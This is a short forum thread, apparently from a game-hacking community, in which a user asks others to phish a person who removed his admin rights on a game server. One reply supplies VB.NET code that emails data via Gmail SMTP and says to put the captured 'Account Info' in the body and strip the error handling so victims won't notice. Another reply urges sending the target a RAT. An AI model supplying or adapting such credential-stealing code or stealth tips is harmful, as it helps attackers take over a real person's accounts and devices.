Thread: Need phishers.

Results 1 to 5 of 5
  1. #1
    Remember's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Me mums basement
    Posts
    1,426
    Reputation
    31
    Thanks
    290

    Need phishers.

    Hi Guys, i bought Admin on a server from a guy on game and like 1 week after the removes it blocks me and shit...so i want to give this dude it back so can anyone screw this guy out?
    phishing?
    Pm me if you can..!!
    "I treat the camera like a person--I gaze into it."

  2. #2
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Code:
    Imports System.Net.Mail
    
    'Start by creating a mail message object
    Dim MyMailMessage As New MailMessage()
    
    'From requires an instance of the MailAddress type
    MyMailMessage.From = New MailAddress("from_address_here@gmail.com")
    
    'To is a collection of MailAddress types
    MyMailMessage.To.Add("to_address_here@Domain_name_here")
    
    MyMailMessage.Subject = "GMail Test"
    MyMailMessage.Body = "This is the test text for Gmail email"
    
    'Create the SMTPClient object and specify the SMTP GMail server
    Dim SMTPServer As New SmtpClient("smtp.gmail.com")
    SMTPServer.Port = 587
    SMTPServer.Credentials = New System.Net.NetworkCredential("account uid", " account pwd")
    SMTPServer.EnableSsl = True
    
    Try
       SMTPServer.Send(MyMailMessage)
       MessageBox.Show("Email Sent")
    Catch ex As SmtpException
       MessageBox.Show(ex.Message)
    End Try
    Found that in 5 seconds.

    Change body to your Textboxes, and your subject to "Account Info" or whatever.
    Remove the Try Catch, or they'll know your program is sending an email lol.

  3. #3
    If ℜul℮s doηt b℮ηd, th℮y ฿r℮αk.
    Donator
    DarkByte7's Avatar
    Join Date
    Oct 2011
    Gender
    male
    Location
    n/a
    Posts
    368
    Reputation
    24
    Thanks
    368
    My Mood
    Cynical
    Couldn't you just remove this line of code instead of removing the entire Try Catch?
    Code:
      MessageBox.Show(ex.Message)


     


  4. #4
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Quote Originally Posted by GreenLighting View Post
    Couldn't you just remove this line of code instead of removing the entire Try Catch?
    Code:
      MessageBox.Show(ex.Message)
    Yeah.
    This was only an example.

    If I was to use a phisher, I would have it try and login, and if the login fails, it wouldn't send the email.
    Phishers are gay anyways, send him a fucking RAT.

  5. #5
    Remember's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Me mums basement
    Posts
    1,426
    Reputation
    31
    Thanks
    290
    Quote Originally Posted by Jamal View Post


    Yeah.
    This was only an example.

    If I was to use a phisher, I would have it try and login, and if the login fails, it wouldn't send the email.
    Phishers are gay anyways, send him a fucking RAT.
    @Jamal
    Do it for me? im not used to this crap.
    "I treat the camera like a person--I gaze into it."

Similar Threads

  1. I need a phisher.
    By EwanWarFox in forum Combat Arms Hack Requests
    Replies: 20
    Last Post: 08-23-2011, 07:27 PM
  2. [Request] i need account Phisher please
    By vampirekid in forum CrossFire Discussions
    Replies: 3
    Last Post: 08-21-2011, 05:44 PM
  3. I'M need hax to WARROCK
    By xzizexzize in forum WarRock - International Hacks
    Replies: 5
    Last Post: 12-27-2005, 11:07 PM
  4. i need short icq number pls and hack to wr..
    By BoneXDBreaker in forum WarRock - International Hacks
    Replies: 1
    Last Post: 12-26-2005, 05:08 PM